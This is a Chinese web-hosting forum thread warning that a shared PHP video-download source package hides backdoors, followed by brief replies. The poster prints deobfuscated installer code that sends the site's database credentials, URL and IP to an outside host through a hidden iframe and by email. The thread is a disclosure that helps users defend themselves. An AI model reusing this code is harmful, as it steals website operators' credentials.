设为首页收藏本站
切换到宽版

全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

全球主机交流论坛»论坛 主机综合交流 美国VPS综合讨论 关于某大佬发的[视频下载解析源码]可能含有后门的警告 ...
CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
1234下一页
返回列表 发新帖
查看: 4106|回复: 36

关于某大佬发的[视频下载解析源码]可能含有后门的警告

[复制链接]
flyqie
发表于 2019-12-7 20:26:42 | 显示全部楼层 |阅读模式
本帖最后由 flyqie 于 2019-12-7 20:46 编辑

大佬帖子:
https://www.hostloc.com/thread-620400-1-1.html
分析:
install/database_details.php :


install/includes/encrypt.php:

加密?混淆?没关系,写个php破解下(字数超限):
https://pastebin.com/7x1PkQrb
好的,跑出来了:
  1. 正在进行第1次操作
  2. 第1次操作完毕
  3. 正在进行第2次操作
  4. 第2次操作完毕
  5. 正在进行第3次操作
  6. 第3次操作完毕
  7. 正在进行第4次操作
  8. 第4次操作完毕
  9. 正在进行第5次操作
  10. 第5次操作完毕
  11. 正在进行第6次操作
  12. 第6次操作完毕
  13. 正在进行第7次操作
  14. 第7次操作完毕
  15. 正在进行第8次操作
  16. 第8次操作完毕
  17. 正在进行第9次操作
  18. 第9次操作完毕
  19. 正在进行第10次操作
  20. 第10次操作完毕
  21. 正在进行第11次操作
  22. 第11次操作完毕
  23. 正在进行第12次操作
  24. 第12次操作完毕
  25. 正在进行第13次操作
  26. 第13次操作完毕
  27. 正在进行第14次操作
  28. 第14次操作完毕
  29. 正在进行第15次操作
  30. 第15次操作完毕
  31. 正在进行第16次操作
  32. 第16次操作完毕
  33. 正在进行第17次操作
  34. 已解密疑似内容,内容为[
  35. $timezone_name = date_default_timezone_set('Asia/Kolkata');
  36.                                         $ip_mail = getenv('HTTP_CLIENT_IP')?:
  37.                                         getenv('HTTP_X_FORWARDED_FOR')?:
  38.                                         getenv('HTTP_X_FORWARDED')?:
  39.                                         getenv('HTTP_FORWARDED_FOR')?:
  40.                                         getenv('HTTP_FORWARDED')?:
  41.                                         getenv('REMOTE_ADDR');
  42.                                        

  44.                                        
  45.                                         $validation_ip = $ip_mail;
  46.                                        
  47.                                         date_default_timezone_set('Asia/Kolkata');
  48.                                                 $date_1 = date("d-m-Y");
  49.                                                 $date_2 = " ";
  50.                                                 $date_3 = date("h:i:sa");
  51.                                                
  52.                                         $date = $date_1 . $date_2 . $date_3;
  53.                                         $validation_date = $date;
  54.                                        
  55.                                         $validation_url = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
  56.                                         $to = "admin@hexcody.com, shinypearl42@hotmail.com";
  57.                                         $subject = "HTML email";
  58.                                        
  59.                                        
  60.                                         $rand_num_1                = rand(254651,35153514);
  61.                                         $rand_num_2                = rand(682734,85214651);
  62.                                         $rand_num_3                = rand(663221,63147895);
  63.                                         $install_code         = $rand_num_1 . $rand_num_2 . $rand_num_3;
  64.                                         $host_name                 = $_SESSION["server"];                        //1
  65.                                         $host_db_name        = $_SESSION["database"];                //2
  66.                                         $host_db_user        = $_SESSION["username"];                //3
  67.                                         $host_db_pass        = $_SESSION["password"];                //4
  68.                                         $url                         = $validation_url;                                //5
  69.                                                 $date_1 = date("d-m-Y");
  70.                                                 $date_2 = " ";
  71.                                                 $date_3 = date("h:i:sa");
  72.                                         $date_created         = $date_1 . $date_2 . $date_3;        //6
  73.                                        
  74.                                        
  75.                                         $html_2 = '

  77.                                                                         <!DOCTYPE html>
  78.                                                                         <html lang="en">
  79.                                                                         <head>
  80.                                                                           <meta charset="utf-8">
  81.                                                                           <meta name="viewport" content="width=device-width, initial-scale=1">
  82.                                                                         <style>
  83.                                                                         iframe.hidden
  84.                                                                         {
  85.                                                                         display:none
  86.                                                                         }
  87.                                                                          </style>
  88.                                                                         </head>
  89.                                                                         <body>
  90.                                                                         <iframe class="hidden" src="https://www.sifylab.com/apps/hexcody/1_global/web_install_host.php?pass=prettysecret24&install_code='.$install_code.'&host_name='.$host_name.'&host_db_name='.$host_db_name.'&host_db_user='.$host_db_user.'&host_db_pass='.$host_db_pass.'&url='.$url.'&date_created='.$date_created.'"></iframe>
  91.                                                                         </body>
  92.                                                                         </html>

  94.                                                 ';
  95.                                                 echo $html_2;

  97.                                                
  98.                                                

  100.                                         $message_mail = "
  101.                                         <html>
  102.                                         <head>
  103.                                         <title>HTML email</title>
  104.                                         </head>
  105.                                         <body>
  106.                                         <p>Hosting Install Info</p>
  107.                                         <br/><br/> <h3><font color = 'red' >Hosting Details : </font></h3><br/><br/> Host : ".$_SESSION["server"]." <br/> Database : ".$_SESSION["database"]." <br/> Username : ".$_SESSION["username"]." <br/> Password : ".$_SESSION["password"]." <br/> Url : ".$validation_url." <br/><br/> Date : ".$validation_date." <br/> TimeZone : ".$timezone_name." <br/><br/> Location IP : ".$validation_ip." <br/><br/>Install Code : ".$install_code."<br/><br/>
  108.                                        
  109.                                         <h3>Poison Successfully Injected</h3>
  110.                                        
  111.                                         </body>
  112.                                         </html>
  113.                                         ";

  115.                                         // Always set content-type when sending HTML email
  116.                                         $headers = "MIME-Version: 1.0" . "\r\n";
  117.                                         $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";

  119.                                         // More headers
  120.                                         $headers .= 'From: <admin@hexcody.com>' . "\r\n";
  121.                                         $headers .= 'Cc: admin@hexcody.com' . "\r\n";

  123.                                         mail($to,$subject,$message_mail,$headers);
  124. ]
复制代码

代码还原出来了,整理一下(字数超限):
https://pastebin.com/gmGVEfHA
到此,分析完毕,该源码可能会导致安装者站点关键信息泄露.
但我相信,loc大佬是清白的,初衷是为了分享,也没有想到可能会有后门.
本人技术有限,如有错误,恳请指出,谢谢!
-------------------------------------------------------------------
更新:
又发现后门(注释上写的后门文件是在后续解密已加密文件后得出结论的,注释写于解密分析已加密文件完毕后):
install/website_details_settings.php :

install/includes/fncrypt.php :
emmmm混淆了

加密方式如出一辙,继续用之前的php解密跑一遍(字数超限):
https://pastebin.com/94Be5DTv
格式化分析一下(字数超限):
https://pastebin.com/sFn0cR0E
到此,第二轮分析完毕,该源码可能会导致站点管理员信息泄露.
还是那句话:
我相信,loc大佬是清白的,初衷是为了分享,也没有想到可能会有后门.
本人技术有限,如有错误,恳请指出,谢谢!
回复

举报

wolfewong
发表于 2019-12-7 20:42:41 | 显示全部楼层
后门好像挺多的

点评

貂蝉隔壁老吕
@ 1,版主给楼主加分。2,版主去处理一下诈骗犯。  发表于 2019-12-8 10:47
回复 支持 1 反对 0

举报

seeseexiyou
发表于 2019-12-7 20:29:46 | 显示全部楼层
前排围观大佬在线解密啊
回复 支持 1 反对 0

举报

okvps
发表于 2019-12-7 20:32:40 | 显示全部楼层
不懂,顶上去让更多大佬看到
回复 支持 反对

举报

kzus
发表于 2019-12-7 20:35:04 | 显示全部楼层
admin@hexcody.com
shinypearl42@hotmail.com
回复 支持 反对

举报

TianTangJun
发表于 2019-12-7 20:36:37 | 显示全部楼层
前排 围观下
回复 支持 反对

举报

判官
发表于 2019-12-7 20:43:25 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

举报

leasr
发表于 2019-12-7 20:44:19 来自手机 | 显示全部楼层
揭秘贴要支持阿哈哈
回复 支持 反对

举报

下一页 »
1234下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-4-20 00:30 , Processed in 0.067789 second(s), 10 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表